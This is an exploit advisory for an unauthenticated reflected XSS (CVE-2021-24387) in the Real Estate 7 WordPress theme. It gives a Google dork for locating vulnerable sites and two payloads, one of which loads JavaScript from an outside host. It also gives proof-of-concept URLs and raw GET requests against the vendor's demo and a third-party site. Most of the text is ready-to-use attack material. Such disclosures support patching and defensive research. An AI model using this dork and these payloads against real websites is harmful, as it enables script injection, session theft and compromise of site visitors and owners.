[+] :: VULNERABILITY: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS [+] :: GOOGLE DORK: inurl:/wp-content/themes/realestate-7/ [+] :: DATE: 2021-05-25 [+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ] [+] :: VENDOR: Contempo Themes [ https://www.contempothemes.com ] [+] :: SOFTWARE VERSION: < 3.1.1 [+] :: SOFTWARE LINK: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778 [+] :: CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N [+] :: CWE: CWE-79 [+] :: CVE: CVE-2021-24387 [i] == [ Info: ] An Unauthenticated Reflected XSS vulnerability was discovered in the Real Estate 7 theme through v3.1.1 for WordPress. Vulnerable parameter(s): &ct_community=. [$] == [ Impact: ] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. [%] == [ Payloads: ] <script src=//m0ze.ru/payload/a.js></script> <script>alert(document.domain);</script> [!] == [ PoC #1 | Unauthenticated Reflected XSS | &ct_community: ] https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%20src=//m0ze.ru/payload/a.js%3E%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng HTTP/2 Host: elementor3.contempothemes.com [!] == [ PoC #2 | Unauthenticated Reflected XSS | &ct_community: ] https://misionloreto.com/?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct_mls=&ct_brokerage=0&lat&lng HTTP/2 Host: misionloreto.com [@] == [ Contacts: ] Website: visse.ru Medium: @visse